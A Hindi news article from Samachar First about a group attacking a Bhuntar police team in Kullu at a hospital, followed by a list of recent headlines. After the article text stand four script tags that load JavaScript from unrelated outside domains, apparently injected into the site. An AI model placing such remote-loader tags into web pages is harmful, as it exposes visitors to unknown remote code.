कुल्लूः नशे में धुत व्यक्ति का मेडिकल करवाने अस्पताल पहुंची पुलिस टीम पर हमला

<p>भुंतर पुलिस की एक टीम पर कुछ लोगों ने हमला कर दिया जिसमें एक एएसआई गंभीर रूप से घायल हो गया। जबकि होमगार्ड जवान और पुलिस का चालक भी घायल हो गया है। घटना कुछ यूं पेश आई जब भुंतर पुलिस का एक दल एएसआई इंद्रदेव के नेतृत्व में क्षेत्र में नशे के खिलाफ गश्त पर थी तो इस दौरान भुंतर के सिनेमा हाल के सामने पांच लोग शराब पी रहे थे। जब पुलिस उनके पास पहुंची तो उनमें से 4 लोग वहां से भाग गए और एक वरूण सूद नाम का व्यक्ति पुलिस के साथ उलझ गया।</p>

<p>पुलिस ने जब व्यक्ति को मेडिकल करवाने के लिए अस्पताल पहुंचाया तो इस दैरान 2 गाडियों में करीब 8-9 लोग आए और डॉक्टरों के सामने पुलिस पार्टी पर हमला कर दिया। जिसमें एएसआई गंभीर रूप से घायल हो गया और उसके चेहरे पर टांके लगाए गए। जबकि एचएचसी होशियार और चालक मनोज भी इस घटना में घायल हो गए हैं। पुलिस टीम पर हमला करने के बाद वे सभी मौके से भाग गए। उसके बाद में पुलिस टीम ने उनकी धरपकड़ शुरू की जिसमें से पुलिस ने चार लोगों को गिरफ्तार कर लिया है।</p>

<p>एसपी कुल्लू गौरव सिंह ने बताया कि उनके खिलाफ पुलिस ने आईपीसी की धारा 353, 332,147, 149, 225 के तहत मामला दर्ज़ कर लिया है। गौर रहे कि पुलिस के अनुसार वरूण नाम के शख्स ने पुलिस को यह भी धमकी दी कि अगर उसे पुलिस थाने ले जाया गया तो वह बहुत कुछ कर सकता है। बाजार बंद कर सकता है। सरकार को उनके खिलाफ खड़ी कर सकता है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1576918151341″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

शिमला का चिट्टा किंगपिन महात्‍मा पुलिस शिकंजे में, संपत्ति होगी जब्त

    Shimla: हिमाचल की राजधानी शिमला में चिट्टा तस्‍करों का नेक्‍सस चला रहे किंगपिन…

16 mins ago

मोदी-बाइडेन वार्ता में उभरे सामरिक संबंध, कई प्रमुख मुद्दों पर मंथन

  समाचार फर्स्‍ट एजेंसी Modi America visit: प्रधानमंत्री नरेंद्र मोदी ने अमेरिकी राष्ट्रपति जो बाइडेन…

3 hours ago

बिजली के करंट के साथ अब बढ़ेगा पानी का बिल, ग्रामीण इलाकों पर असर

  पहली अक्तूबर से बढ़ेगा रेट,प्रति कनेक्शन प्रतिमाह कटेगा बिल 20 किलो लीटर तक पानी…

3 hours ago

जानें कैसे रहेगा रविवार का राशिफल

  मेष🐐 (चू, चे, चो, ला, ली, लू, ले, लो, अ) आज आपको कोई शुभ…

4 hours ago

Himachal: भाजपा विधायक बिक्रम सिंह ने लौटाई एमएचए की सिक्योरिटी

  धर्मशाला:जसवां प्रागपुर से भाजपा विधायक बिक्रम सिंह ने एमएचए की सिक्योरिटी लौटा दी है।…

17 hours ago

शिलाई में सड़कों पर उतरे हिन्दू संगठनों का प्रदर्शन

  शिलाई में वक्फ बोर्ड व अवैध तरीके से रह रहे लोगों का विरोध Shillai:…

22 hours ago